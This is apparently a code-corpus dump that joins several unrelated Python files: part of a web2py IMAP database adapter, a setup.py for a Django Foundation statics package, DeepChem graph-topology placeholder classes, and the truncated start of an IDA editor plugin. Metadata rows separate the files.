# remove unwanted characters and store original names
# Don't allow leading non alphabetic characters
mailbox_name = re.sub('^[_0-9]*', '', re.sub('[^_\w]','',re.sub('[/ ]','_',mailbox)))
mailboxes.append(mailbox_name)
self.connection.mailbox_names[mailbox_name] = mailbox
return mailboxes
def get_query_mailbox(self, query):
nofield = True
tablename = None
attr = query
while nofield:
if hasattr(attr, "first"):
attr = attr.first
if isinstance(attr, Field):
return attr.tablename
elif isinstance(attr, Query):
pass
else:
return None
else:
return None
return tablename
def is_flag(self, flag):
if self.search_fields.get(flag, None) in self.flags.values():
return True
else:
return False
def define_tables(self, mailbox_names=None):
"""
Auto create common IMAP fileds
This function creates fields definitions "statically"
meaning that custom fields as in other adapters should
not be supported and definitions handled on a service/mode
basis (local syntax for Gmail(r), Ymail(r)
Returns a dictionary with tablename, server native mailbox name
pairs.
"""
if mailbox_names:
# optional statically declared mailboxes
self.static_names = mailbox_names
else:
self.static_names = None
if not isinstance(self.connection.mailbox_names, dict):
self.get_mailboxes()
names = self.connection.mailbox_names.keys()
for name in names:
self.db.define_table("%s" % name,
Field("uid", writable=False),
Field("created", "datetime", writable=False),
Field("content", "text", writable=False),
Field("to", writable=False),
Field("cc", writable=False),
Field("bcc", writable=False),
Field("sender", writable=False),
Field("size", "integer", writable=False),
Field("subject", writable=False),
Field("mime", writable=False),
Field("email", "text", writable=False, readable=False),
Field("attachments", "text", writable=False, readable=False),
Field("encoding", writable=False),
Field("answered", "boolean"),
Field("deleted", "boolean"),
Field("draft", "boolean"),
Field("flagged", "boolean"),
Field("recent", "boolean", writable=False),
Field("seen", "boolean")
)
# Set a special _mailbox attribute for storing
# native mailbox names
self.db[name].mailbox = \
self.connection.mailbox_names[name]
# decode quoted printable
self.db[name].to.represent = self.db[name].cc.represent = \
self.db[name].bcc.represent = self.db[name].sender.represent = \
self.db[name].subject.represent = self.header_represent
# Set the db instance mailbox collections
self.db.mailboxes = self.connection.mailbox_names
return self.db.mailboxes
def create_table(self, *args, **kwargs):
# not implemented
# but required by DAL
pass
def select(self, query, fields, attributes):
""" Searches and Fetches records and return web2py rows
"""
# move this statement elsewhere (upper-level)
if use_common_filters(query):
query = self.common_filter(query, [self.get_query_mailbox(query),])
import email
# get records from imap server with search + fetch
# convert results to a dictionary
tablename = None
fetch_results = list()
if isinstance(query, Query):
tablename = self.get_table(query)._dalname
mailbox = self.connection.mailbox_names.get(tablename, None)
if mailbox is None:
raise ValueError("Mailbox name not found: %s" % mailbox)
else:
# select with readonly
result, selected = self.connection.select(mailbox, True)
if result != "OK":
raise Exception("IMAP error: %s" % selected)
self.mailbox_size = int(selected[0])
search_query = "(%s)" % str(query).strip()
search_result = self.connection.uid("search", None, search_query)
# Normal IMAP response OK is assumed (change this)
if search_result[0] == "OK":
# For "light" remote server responses just get the first
# ten records (change for non-experimental implementation)
# However, light responses are not guaranteed with this
# approach, just fewer messages.
limitby = attributes.get('limitby', None)
messages_set = search_result[1][0].split()
# descending order
messages_set.reverse()
if limitby is not None:
# TODO: orderby, asc/desc, limitby from complete message set
messages_set = messages_set[int(limitby[0]):int(limitby[1])]
# keep the requests small for header/flags
if any([(field.name in ["content", "size",
"attachments", "email"]) for
field in fields]):
imap_fields = "(RFC822 FLAGS)"
else:
imap_fields = "(RFC822.HEADER FLAGS)"
if len(messages_set) > 0:
# create fetch results object list
# fetch each remote message and store it in memmory
# (change to multi-fetch command syntax for faster
# transactions)
for uid in messages_set:
# fetch the RFC822 message body
typ, data = self.connection.uid("fetch", uid, imap_fields)
if typ == "OK":
fr = {"message": int(data[0][0].split()[0]),
"uid": long(uid),
"email": email.message_from_string(data[0][1]),
"raw_message": data[0][1]}
fr["multipart"] = fr["email"].is_multipart()
# fetch flags for the message
if PY2:
fr["flags"] = self.driver.ParseFlags(data[1])
else:
fr["flags"] = self.driver.ParseFlags(
bytes(data[1], "utf-8"))
fetch_results.append(fr)
else:
# error retrieving the message body
raise Exception("IMAP error retrieving the body: %s" % data)
else:
raise Exception("IMAP search error: %s" % search_result[1])
elif isinstance(query, (Expression, basestring)):
raise NotImplementedError()
else:
raise TypeError("Unexpected query type")
imapqry_dict = {}
imapfields_dict = {}
if len(fields) == 1 and isinstance(fields[0], SQLALL):
allfields = True
elif len(fields) == 0:
allfields = True
else:
allfields = False
if allfields:
colnames = ["%s.%s" % (tablename, field) for field in self.search_fields.keys()]
else:
colnames = [field.longname for field in fields]
for k in colnames:
imapfields_dict[k] = k
imapqry_list = list()
imapqry_array = list()
for fr in fetch_results:
attachments = []
content = []
size = 0
n = int(fr["message"])
item_dict = dict()
message = fr["email"]
uid = fr["uid"]
charset = self.get_charset(message)
flags = fr["flags"]
raw_message = fr["raw_message"]
# Return messages data mapping static fields
# and fetched results. Mapping should be made
# outside the select function (with auxiliary
# instance methods)
# pending: search flags states trough the email message
# instances for correct output
# preserve subject encoding (ASCII/quoted printable)
if "%s.id" % tablename in colnames:
item_dict["%s.id" % tablename] = n
if "%s.created" % tablename in colnames:
item_dict["%s.created" % tablename] = self.convert_date(message["Date"])
if "%s.uid" % tablename in colnames:
item_dict["%s.uid" % tablename] = uid
if "%s.sender" % tablename in colnames:
# If there is no encoding found in the message header
# force utf-8 replacing characters (change this to
# module's defaults). Applies to .sender, .to, .cc and .bcc fields
item_dict["%s.sender" % tablename] = message["From"]
if "%s.to" % tablename in colnames:
item_dict["%s.to" % tablename] = message["To"]
if "%s.cc" % tablename in colnames:
if "Cc" in message.keys():
item_dict["%s.cc" % tablename] = message["Cc"]
else:
item_dict["%s.cc" % tablename] = ""
if "%s.bcc" % tablename in colnames:
if "Bcc" in message.keys():
item_dict["%s.bcc" % tablename] = message["Bcc"]
else:
item_dict["%s.bcc" % tablename] = ""
if "%s.deleted" % tablename in colnames:
item_dict["%s.deleted" % tablename] = "\\Deleted" in flags
if "%s.draft" % tablename in colnames:
item_dict["%s.draft" % tablename] = "\\Draft" in flags
if "%s.flagged" % tablename in colnames:
item_dict["%s.flagged" % tablename] = "\\Flagged" in flags
if "%s.recent" % tablename in colnames:
item_dict["%s.recent" % tablename] = "\\Recent" in flags
if "%s.seen" % tablename in colnames:
item_dict["%s.seen" % tablename] = "\\Seen" in flags
if "%s.subject" % tablename in colnames:
item_dict["%s.subject" % tablename] = message["Subject"]
if "%s.answered" % tablename in colnames:
item_dict["%s.answered" % tablename] = "\\Answered" in flags
if "%s.mime" % tablename in colnames:
item_dict["%s.mime" % tablename] = message.get_content_type()
if "%s.encoding" % tablename in colnames:
item_dict["%s.encoding" % tablename] = charset
# Here goes the whole RFC822 body as an email instance
# for controller side custom processing
# The message is stored as a raw string
# >> email.message_from_string(raw string)
# returns a Message object for enhanced object processing
if "%s.email" % tablename in colnames:
# WARNING: no encoding performed (raw message)
item_dict["%s.email" % tablename] = raw_message
# Size measure as suggested in a Velocity Reviews post
# by Tim Williams: "how to get size of email attachment"
# Note: len() and server RFC822.SIZE reports doesn't match
# To retrieve the server size for representation would add a new
# fetch transaction to the process
for part in message.walk():
maintype = part.get_content_maintype()
if ("%s.attachments" % tablename in colnames) or \
("%s.content" % tablename in colnames):
payload = part.get_payload(decode=True)
if payload:
filename = part.get_filename()
values = {"mime": part.get_content_type()}
if ((filename or not "text" in maintype) and
("%s.attachments" % tablename in colnames)):
values.update({"payload": payload,
"filename": filename,
"encoding": part.get_content_charset(),
"disposition": part["Content-Disposition"]})
attachments.append(values)
elif (("text" in maintype) and
("%s.content" % tablename in colnames)):
values.update({"text": self.encode_text(payload,
self.get_charset(part))})
content.append(values)
if "%s.size" % tablename in colnames:
if part is not None:
size += len(str(part))
item_dict["%s.content" % tablename] = content
item_dict["%s.attachments" % tablename] = attachments
item_dict["%s.size" % tablename] = size
imapqry_list.append(item_dict)
# extra object mapping for the sake of rows object
# creation (sends an array or lists)
for item_dict in imapqry_list:
imapqry_array_item = list()
for fieldname in colnames:
imapqry_array_item.append(item_dict[fieldname])
imapqry_array.append(imapqry_array_item)
# parse result and return a rows object
colnames = colnames
processor = attributes.get('processor',self.parse)
return processor(imapqry_array, fields, colnames)
def insert(self, table, fields):
def add_payload(message, obj):
payload = Message()
encoding = obj.get("encoding", "utf-8")
if encoding and (encoding.upper() in
("BASE64", "7BIT", "8BIT", "BINARY")):
payload.add_header("Content-Transfer-Encoding", encoding)
else:
payload.set_charset(encoding)
mime = obj.get("mime", None)
if mime:
payload.set_type(mime)
if "text" in obj:
payload.set_payload(obj["text"])
elif "payload" in obj:
payload.set_payload(obj["payload"])
if "filename" in obj and obj["filename"]:
payload.add_header("Content-Disposition",
"attachment", filename=obj["filename"])
message.attach(payload)
mailbox = table.mailbox
d = dict(((k.name, v) for k, v in fields))
date_time = d.get("created") or datetime.datetime.now()
struct_time = date_time.timetuple()
if len(d) > 0:
message = d.get("email", None)
attachments = d.get("attachments", [])
content = d.get("content", [])
flags = " ".join(["\\%s" % flag.capitalize() for flag in
("answered", "deleted", "draft", "flagged",
"recent", "seen") if d.get(flag, False)])
if not message:
from email.message import Message
mime = d.get("mime", None)
charset = d.get("encoding", None)
message = Message()
message["from"] = d.get("sender", "")
message["subject"] = d.get("subject", "")
message["date"] = self.convert_date(date_time, imf=True)
if mime:
message.set_type(mime)
if charset:
message.set_charset(charset)
for item in ("to", "cc", "bcc"):
value = d.get(item, "")
if isinstance(value, basestring):
message[item] = value
else:
message[item] = ";".join([i for i in
value])
if (not message.is_multipart() and
(not message.get_content_type().startswith(
"multipart"))):
if isinstance(content, basestring):
message.set_payload(content)
elif len(content) > 0:
message.set_payload(content[0]["text"])
else:
[add_payload(message, c) for c in content]
[add_payload(message, a) for a in attachments]
message = message.as_string()
result, data = self.connection.append(mailbox, flags, struct_time, message)
if result == "OK":
uid = int(re.findall("\d+", str(data))[-1])
return self.db(table.uid==uid).select(table.id).first().id
else:
raise Exception("IMAP message append failed: %s" % data)
else:
raise NotImplementedError("IMAP empty insert is not implemented")
def update(self, table, query, fields):
# TODO: the adapter should implement an .expand method
commands = list()
rowcount = 0
tablename = table._dalname
if use_common_filters(query):
query = self.common_filter(query, [tablename,])
mark = []
unmark = []
if query:
for item in fields:
field = item[0]
name = field.name
value = item[1]
if self.is_flag(name):
flag = self.search_fields[name]
if (value is not None) and (flag != "\\Recent"):
if value:
mark.append(flag)
else:
unmark.append(flag)
result, data = self.connection.select(
self.connection.mailbox_names[tablename])
string_query = "(%s)" % query
result, data = self.connection.search(None, string_query)
store_list = [item.strip() for item in data[0].split()
if item.strip().isdigit()]
# build commands for marked flags
for number in store_list:
result = None
if len(mark) > 0:
commands.append((number, "+FLAGS", "(%s)" % " ".join(mark)))
if len(unmark) > 0:
commands.append((number, "-FLAGS", "(%s)" % " ".join(unmark)))
for command in commands:
result, data = self.connection.store(*command)
if result == "OK":
rowcount += 1
else:
raise Exception("IMAP storing error: %s" % data)
return rowcount
def count(self,query,distinct=None):
counter = 0
tablename = self.get_query_mailbox(query)
if query and tablename is not None:
if use_common_filters(query):
query = self.common_filter(query, [tablename,])
result, data = self.connection.select(self.connection.mailbox_names[tablename])
string_query = "(%s)" % query
result, data = self.connection.search(None, string_query)
store_list = [item.strip() for item in data[0].split() if item.strip().isdigit()]
counter = len(store_list)
return counter
def delete(self, table, query):
counter = 0
tablename = table._dalname
if query:
if use_common_filters(query):
query = self.common_filter(query, [tablename,])
result, data = self.connection.select(self.connection.mailbox_names[tablename])
string_query = "(%s)" % query
result, data = self.connection.search(None, string_query)
store_list = [item.strip() for item in data[0].split() if item.strip().isdigit()]
for number in store_list:
result, data = self.connection.store(number, "+FLAGS", "(\\Deleted)")
if result == "OK":
counter += 1
else:
raise Exception("IMAP store error: %s" % data)
if counter > 0:
result, data = self.connection.expunge()
return counter
def BELONGS(self, first, second):
result = None
name = self.search_fields[first.name]
if name == "MESSAGE":
values = [str(val) for val in second if str(val).isdigit()]
result = "%s" % ",".join(values).strip()
elif name == "UID":
values = [str(val) for val in second if str(val).isdigit()]
result = "UID %s" % ",".join(values).strip()
else:
raise Exception("Operation not supported")
# result = "(%s %s)" % (self.expand(first), self.expand(second))
return result
def CONTAINS(self, first, second, case_sensitive=False):
# silently ignore, only case sensitive
result = None
name = self.search_fields[first.name]
if name in ("FROM", "TO", "SUBJECT", "TEXT"):
result = "%s \"%s\"" % (name, self.expand(second))
else:
if first.name in ("cc", "bcc"):
result = "%s \"%s\"" % (first.name.upper(), self.expand(second))
elif first.name == "mime":
result = "HEADER Content-Type \"%s\"" % self.expand(second)
else:
raise Exception("Operation not supported")
return result
def GT(self, first, second):
result = None
name = self.search_fields[first.name]
if name == "MESSAGE":
last_message = self.get_last_message(first.tablename)
result = "%d:%d" % (int(self.expand(second)) + 1, last_message)
elif name == "UID":
# GT and LT may not return
# expected sets depending on
# the uid format implemented
try:
pedestal, threshold = self.get_uid_bounds(first.tablename)
except TypeError:
e = sys.exc_info()[1]
self.db.logger.debug("Error requesting uid bounds: %s", str(e))
return ""
try:
lower_limit = int(self.expand(second)) + 1
except (ValueError, TypeError):
e = sys.exc_info()[1]
raise Exception("Operation not supported (non integer UID)")
result = "UID %s:%s" % (lower_limit, threshold)
elif name == "DATE":
result = "SINCE %s" % self.convert_date(second, add=datetime.timedelta(1))
elif name == "SIZE":
result = "LARGER %s" % self.expand(second)
else:
raise Exception("Operation not supported")
return result
def GE(self, first, second):
result = None
name = self.search_fields[first.name]
if name == "MESSAGE":
last_message = self.get_last_message(first.tablename)
result = "%s:%s" % (self.expand(second), last_message)
elif name == "UID":
# GT and LT may not return
# expected sets depending on
# the uid format implemented
try:
pedestal, threshold = self.get_uid_bounds(first.tablename)
except TypeError:
e = sys.exc_info()[1]
self.db.logger.debug("Error requesting uid bounds: %s", str(e))
return ""
lower_limit = self.expand(second)
result = "UID %s:%s" % (lower_limit, threshold)
elif name == "DATE":
result = "SINCE %s" % self.convert_date(second)
else:
raise Exception("Operation not supported")
return result
def LT(self, first, second):
result = None
name = self.search_fields[first.name]
if name == "MESSAGE":
result = "%s:%s" % (1, int(self.expand(second)) - 1)
elif name == "UID":
try:
pedestal, threshold = self.get_uid_bounds(first.tablename)
except TypeError:
e = sys.exc_info()[1]
self.db.logger.debug("Error requesting uid bounds: %s", str(e))
return ""
try:
upper_limit = int(self.expand(second)) - 1
except (ValueError, TypeError):
e = sys.exc_info()[1]
raise Exception("Operation not supported (non integer UID)")
result = "UID %s:%s" % (pedestal, upper_limit)
elif name == "DATE":
result = "BEFORE %s" % self.convert_date(second)
elif name == "SIZE":
result = "SMALLER %s" % self.expand(second)
else:
raise Exception("Operation not supported")
return result
def LE(self, first, second):
result = None
name = self.search_fields[first.name]
if name == "MESSAGE":
result = "%s:%s" % (1, self.expand(second))
elif name == "UID":
try:
pedestal, threshold = self.get_uid_bounds(first.tablename)
except TypeError:
e = sys.exc_info()[1]
self.db.logger.debug("Error requesting uid bounds: %s", str(e))
return ""
upper_limit = int(self.expand(second))
result = "UID %s:%s" % (pedestal, upper_limit)
elif name == "DATE":
result = "BEFORE %s" % self.convert_date(second, add=datetime.timedelta(1))
else:
raise Exception("Operation not supported")
return result
def NE(self, first, second=None):
if (second is None) and isinstance(first, Field):
# All records special table query
if first.type == "id":
return self.GE(first, 1)
result = self.NOT(self.EQ(first, second))
result = result.replace("NOT NOT", "").strip()
return result
def EQ(self,first,second):
name = self.search_fields[first.name]
result = None
if name is not None:
if name == "MESSAGE":
# query by message sequence number
result = "%s" % self.expand(second)
elif name == "UID":
result = "UID %s" % self.expand(second)
elif name == "DATE":
result = "ON %s" % self.convert_date(second)
elif name in self.flags.values():
if second:
result = "%s" % (name.upper()[1:])
else:
result = "NOT %s" % (name.upper()[1:])
else:
raise Exception("Operation not supported")
else:
raise Exception("Operation not supported")
return result
def AND(self, first, second):
result = "%s %s" % (self.expand(first), self.expand(second))
return result
def OR(self, first, second):
result = "OR %s %s" % (self.expand(first), self.expand(second))
return "%s" % result.replace("OR OR", "OR")
def NOT(self, first):
result = "NOT %s" % self.expand(first)
return result
| apache-2.0 | 6,151,325,805,287,477,000 | 39.879392 | 120 | 0.519421 | false |
benbacardi/django-foundation-statics | setup.py | 1 | 1443 | from setuptools import setup
setup(
name='django-foundation-statics',
version='5.4.7-2',
url='https://github.com/benbacardi/django-foundation-statics',
description='Zurb Foundation (http://foundation.zurb.com) static files packaged in a django app to speed up new applications and deployment.',
author='Ben Cardy',
author_email='[email protected]',
license='MIT',
keywords='django zurb foundation staticfiles'.split(),
platforms='any',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities',
],
packages=['foundation', 'foundation_scss'],
package_data={
'foundation': [
'static/js/*.js',
'static/js/foundation/*.js',
'static/js/vendor/*.js',
'static/css/*.css',
],
'foundation_scss': [
'static/js/*.js',
'static/js/foundation/*.js',
'static/js/vendor/*.js',
'static/scss/*.scss',
'static/scss/foundation/*.scss',
'static/scss/foundation/components/*.scss'
],
},
include_package_data=True,
)
| mit | 5,779,507,622,633,271,000 | 33.357143 | 146 | 0.577963 | false |
joegomes/deepchem | deepchem/models/tf_new_models/graph_topology.py | 1 | 16190 | """Manages Placeholders for Graph convolution networks.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
__author__ = "Han Altae-Tran and Bharath Ramsundar"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "MIT"
import numpy as np
import tensorflow as tf
from deepchem.nn.copy import Input
from deepchem.feat.mol_graphs import ConvMol
def merge_two_dicts(x, y):
z = x.copy()
z.update(y)
return z
def merge_dicts(l):
"""Convenience function to merge list of dictionaries."""
merged = {}
for dict in l:
merged = merge_two_dicts(merged, dict)
return merged
class GraphTopology(object):
"""Manages placeholders associated with batch of graphs and their topology"""
def __init__(self, n_feat, name='topology', max_deg=10, min_deg=0):
"""
Note that batch size is not specified in a GraphTopology object. A batch
of molecules must be combined into a disconnected graph and fed to topology
directly to handle batches.
Parameters
----------
n_feat: int
Number of features per atom.
name: str, optional
Name of this manager.
max_deg: int, optional
Maximum #bonds for atoms in molecules.
min_deg: int, optional
Minimum #bonds for atoms in molecules.
"""
#self.n_atoms = n_atoms
self.n_feat = n_feat
self.name = name
self.max_deg = max_deg
self.min_deg = min_deg
self.atom_features_placeholder = tensor = tf.placeholder(
dtype='float32',
shape=(None, self.n_feat),
name=self.name + '_atom_features')
self.deg_adj_lists_placeholders = [
tf.placeholder(
dtype='int32',
shape=(None, deg),
name=self.name + '_deg_adj' + str(deg))
for deg in range(1, self.max_deg + 1)
]
self.deg_slice_placeholder = tf.placeholder(
dtype='int32',
shape=(self.max_deg - self.min_deg + 1, 2),
name=self.name + '_deg_slice')
self.membership_placeholder = tf.placeholder(
dtype='int32', shape=(None,), name=self.name + '_membership')
# Define the list of tensors to be used as topology
self.topology = [self.deg_slice_placeholder, self.membership_placeholder]
self.topology += self.deg_adj_lists_placeholders
self.inputs = [self.atom_features_placeholder]
self.inputs += self.topology
def get_input_placeholders(self):
"""All placeholders.
Contains atom_features placeholder and topology placeholders.
"""
return self.inputs
def get_topology_placeholders(self):
"""Returns topology placeholders
Consists of deg_slice_placeholder, membership_placeholder, and the
deg_adj_list_placeholders.
"""
return self.topology
def get_atom_features_placeholder(self):
return self.atom_features_placeholder
def get_deg_adjacency_lists_placeholders(self):
return self.deg_adj_lists_placeholders
def get_deg_slice_placeholder(self):
return self.deg_slice_placeholder
def get_membership_placeholder(self):
return self.membership_placeholder
def batch_to_feed_dict(self, batch):
"""Converts the current batch of mol_graphs into tensorflow feed_dict.
Assigns the graph information in array of ConvMol objects to the
placeholders tensors
params
------
batch : np.ndarray
Array of ConvMol objects
returns
-------
feed_dict : dict
Can be merged with other feed_dicts for input into tensorflow
"""
# Merge mol conv objects
batch = ConvMol.agglomerate_mols(batch)
atoms = batch.get_atom_features()
deg_adj_lists = [
batch.deg_adj_lists[deg] for deg in range(1, self.max_deg + 1)
]
# Generate dicts
deg_adj_dict = dict(
list(zip(self.deg_adj_lists_placeholders, deg_adj_lists)))
atoms_dict = {
self.atom_features_placeholder: atoms,
self.deg_slice_placeholder: batch.deg_slice,
self.membership_placeholder: batch.membership
}
return merge_dicts([atoms_dict, deg_adj_dict])
class DTNNGraphTopology(GraphTopology):
"""Manages placeholders associated with batch of graphs and their topology"""
def __init__(self,
max_n_atoms,
n_distance=100,
distance_min=-1.,
distance_max=18.,
name='DTNN_topology'):
"""
Parameters
----------
max_n_atoms: int
maximum number of atoms in a molecule
n_distance: int, optional
granularity of distance matrix
step size will be (distance_max-distance_min)/n_distance
distance_min: float, optional
minimum distance of atom pairs, default = -1 Angstorm
distance_max: float, optional
maximum distance of atom pairs, default = 18 Angstorm
"""
#self.n_atoms = n_atoms
self.name = name
self.max_n_atoms = max_n_atoms
self.n_distance = n_distance
self.distance_min = distance_min
self.distance_max = distance_max
self.atom_number_placeholder = tf.placeholder(
dtype='int32',
shape=(None, self.max_n_atoms),
name=self.name + '_atom_number')
self.atom_mask_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_n_atoms),
name=self.name + '_atom_mask')
self.distance_matrix_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_n_atoms, self.max_n_atoms, self.n_distance),
name=self.name + '_distance_matrix')
self.distance_matrix_mask_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_n_atoms, self.max_n_atoms),
name=self.name + '_distance_matrix_mask')
# Define the list of tensors to be used as topology
self.topology = [
self.distance_matrix_placeholder, self.distance_matrix_mask_placeholder
]
self.inputs = [self.atom_number_placeholder]
self.inputs += self.topology
def get_atom_number_placeholder(self):
return self.atom_number_placeholder
def get_distance_matrix_placeholder(self):
return self.distance_matrix_placeholder
def batch_to_feed_dict(self, batch):
"""Converts the current batch of Coulomb Matrix into tensorflow feed_dict.
Assigns the atom number and distance info to the
placeholders tensors
params
------
batch : np.ndarray
Array of Coulomb Matrix
returns
-------
feed_dict : dict
Can be merged with other feed_dicts for input into tensorflow
"""
# Extract atom numbers
atom_number = np.asarray(list(map(np.diag, batch)))
atom_mask = np.sign(atom_number)
atom_number = np.asarray(
np.round(np.power(2 * atom_number, 1 / 2.4)), dtype=int)
ZiZj = []
for molecule in atom_number:
ZiZj.append(np.outer(molecule, molecule))
ZiZj = np.asarray(ZiZj)
distance_matrix = np.expand_dims(batch[:], axis=3)
distance_matrix = np.concatenate(
[distance_matrix] * self.n_distance, axis=3)
distance_matrix_mask = batch[:]
for im, molecule in enumerate(batch):
for ir, row in enumerate(molecule):
for ie, element in enumerate(row):
if element > 0 and ir != ie:
# expand a float value distance to a distance vector
distance_matrix[im, ir, ie, :] = self.gauss_expand(
ZiZj[im, ir, ie] / element, self.n_distance, self.distance_min,
self.distance_max)
distance_matrix_mask[im, ir, ie] = 1
else:
distance_matrix[im, ir, ie, :] = 0
distance_matrix_mask[im, ir, ie] = 0
# Generate dicts
dict_DTNN = {
self.atom_number_placeholder: atom_number,
self.atom_mask_placeholder: atom_mask,
self.distance_matrix_placeholder: distance_matrix,
self.distance_matrix_mask_placeholder: distance_matrix_mask
}
return dict_DTNN
@staticmethod
def gauss_expand(distance, n_distance, distance_min, distance_max):
step_size = (distance_max - distance_min) / n_distance
steps = np.array([distance_min + i * step_size for i in range(n_distance)])
distance_vector = np.exp(-np.square(distance - steps) / (2 * step_size**2))
return distance_vector
class DAGGraphTopology(GraphTopology):
"""GraphTopology for DAG models
"""
def __init__(self, n_feat, batch_size, name='topology', max_atoms=50):
self.n_feat = n_feat
self.name = name
self.max_atoms = max_atoms
self.batch_size = batch_size
self.atom_features_placeholder = tf.placeholder(
dtype='float32',
shape=(self.batch_size * self.max_atoms, self.n_feat),
name=self.name + '_atom_features')
self.parents_placeholder = tf.placeholder(
dtype='int32',
shape=(self.batch_size * self.max_atoms, self.max_atoms,
self.max_atoms),
# molecule * atom(graph) => step => features
name=self.name + '_parents')
self.calculation_orders_placeholder = tf.placeholder(
dtype='int32',
shape=(self.batch_size * self.max_atoms, self.max_atoms),
# molecule * atom(graph) => step
name=self.name + '_orders')
self.membership_placeholder = tf.placeholder(
dtype='int32',
shape=(self.batch_size * self.max_atoms),
name=self.name + '_membership')
# Define the list of tensors to be used as topology
self.topology = [
self.parents_placeholder, self.calculation_orders_placeholder,
self.membership_placeholder
]
self.inputs = [self.atom_features_placeholder]
self.inputs += self.topology
def get_parents_placeholder(self):
return self.parents_placeholder
def get_calculation_orders_placeholder(self):
return self.calculation_orders_placeholder
def batch_to_feed_dict(self, batch):
"""Converts the current batch of mol_graphs into tensorflow feed_dict.
Assigns the graph information in array of ConvMol objects to the
placeholders tensors for DAG models
params
------
batch : np.ndarray
Array of ConvMol objects
returns
-------
feed_dict : dict
Can be merged with other feed_dicts for input into tensorflow
"""
atoms_per_mol = [mol.get_num_atoms() for mol in batch]
n_atom_features = batch[0].get_atom_features().shape[1]
membership = np.concatenate(
[
np.array([1] * n_atoms + [0] * (self.max_atoms - n_atoms))
for i, n_atoms in enumerate(atoms_per_mol)
],
axis=0)
atoms_all = []
# calculation orders for a batch of molecules
parents_all = []
calculation_orders = []
for idm, mol in enumerate(batch):
# padding atom features vector of each molecule with 0
atom_features_padded = np.concatenate(
[
mol.get_atom_features(), np.zeros(
(self.max_atoms - atoms_per_mol[idm], n_atom_features))
],
axis=0)
atoms_all.append(atom_features_padded)
# calculation orders for DAGs
parents = mol.parents
# number of DAGs should equal number of atoms
assert len(parents) == atoms_per_mol[idm]
parents_all.extend(parents[:])
# padding with `max_atoms`
parents_all.extend([
self.max_atoms * np.ones((self.max_atoms, self.max_atoms), dtype=int)
for i in range(self.max_atoms - atoms_per_mol[idm])
])
for parent in parents:
# index for an atom in `parents_all` and `atoms_all` is different,
# this function changes the index from the position in current molecule(DAGs, `parents_all`)
# to position in batch of molecules(`atoms_all`)
# only used in tf.gather on `atom_features_placeholder`
calculation_orders.append(self.index_changing(parent[:, 0], idm))
# padding with `batch_size*max_atoms`
calculation_orders.extend([
self.batch_size * self.max_atoms * np.ones(
(self.max_atoms,), dtype=int)
for i in range(self.max_atoms - atoms_per_mol[idm])
])
atoms_all = np.concatenate(atoms_all, axis=0)
parents_all = np.stack(parents_all, axis=0)
calculation_orders = np.stack(calculation_orders, axis=0)
atoms_dict = {
self.atom_features_placeholder: atoms_all,
self.membership_placeholder: membership,
self.parents_placeholder: parents_all,
self.calculation_orders_placeholder: calculation_orders
}
return atoms_dict
def index_changing(self, index, n_mol):
output = np.zeros_like(index)
for ide, element in enumerate(index):
if element < self.max_atoms:
output[ide] = element + n_mol * self.max_atoms
else:
output[ide] = self.batch_size * self.max_atoms
return output
class WeaveGraphTopology(GraphTopology):
"""Manages placeholders associated with batch of graphs and their topology"""
def __init__(self, max_atoms, n_atom_feat, n_pair_feat,
name='Weave_topology'):
"""
Parameters
----------
max_atoms: int
maximum number of atoms in a molecule
n_atom_feat: int
number of basic features of each atom
n_pair_feat: int
number of basic features of each pair
"""
#self.n_atoms = n_atoms
self.name = name
self.max_atoms = max_atoms
self.n_atom_feat = n_atom_feat
self.n_pair_feat = n_pair_feat
self.atom_features_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_atoms, self.n_atom_feat),
name=self.name + '_atom_features')
self.atom_mask_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_atoms),
name=self.name + '_atom_mask')
self.pair_features_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_atoms, self.max_atoms, self.n_pair_feat),
name=self.name + '_pair_features')
self.pair_mask_placeholder = tf.placeholder(
dtype='float32',
shape=(None, self.max_atoms, self.max_atoms),
name=self.name + '_pair_mask')
self.membership_placeholder = tf.placeholder(
dtype='int32', shape=(None,), name=self.name + '_membership')
# Define the list of tensors to be used as topology
self.topology = [self.atom_mask_placeholder, self.pair_mask_placeholder]
self.inputs = [self.atom_features_placeholder]
self.inputs += self.topology
def get_pair_features_placeholder(self):
return self.pair_features_placeholder
def batch_to_feed_dict(self, batch):
"""Converts the current batch of WeaveMol into tensorflow feed_dict.
Assigns the atom features and pair features to the
placeholders tensors
params
------
batch : np.ndarray
Array of WeaveMol
returns
-------
feed_dict : dict
Can be merged with other feed_dicts for input into tensorflow
"""
# Extract atom numbers
atom_feat = []
pair_feat = []
atom_mask = []
pair_mask = []
membership = []
max_atoms = self.max_atoms
for im, mol in enumerate(batch):
n_atoms = mol.get_num_atoms()
atom_feat.append(
np.pad(mol.get_atom_features(), ((0, max_atoms - n_atoms), (0, 0)),
'constant'))
atom_mask.append(
np.array([1] * n_atoms + [0] * (max_atoms - n_atoms), dtype=float))
pair_feat.append(
np.pad(mol.get_pair_features(), ((0, max_atoms - n_atoms), (
0, max_atoms - n_atoms), (0, 0)), 'constant'))
pair_mask.append(np.array([[1]*n_atoms + [0]*(max_atoms-n_atoms)]*n_atoms + \
[[0]*max_atoms]*(max_atoms-n_atoms), dtype=float))
membership.extend([im] * n_atoms)
atom_feat = np.stack(atom_feat)
pair_feat = np.stack(pair_feat)
atom_mask = np.stack(atom_mask)
pair_mask = np.stack(pair_mask)
membership = np.array(membership)
# Generate dicts
dict_DTNN = {
self.atom_features_placeholder: atom_feat,
self.pair_features_placeholder: pair_feat,
self.atom_mask_placeholder: atom_mask,
self.pair_mask_placeholder: pair_mask,
self.membership_placeholder: membership
}
return dict_DTNN
| mit | -5,590,897,651,264,117,000 | 31.773279 | 101 | 0.635207 | false |
techbliss/Python_editor | 7.0/plugins/Code editor/pyeditor.py | 1 | 41135 | # Created by Storm Shadow www.techbliss.org
# Created by Storm Shadow www.techbliss.org
print "\n" #getting the box fit
print " ###################################################\n" \
" # Author Storm Shadow # \n" \
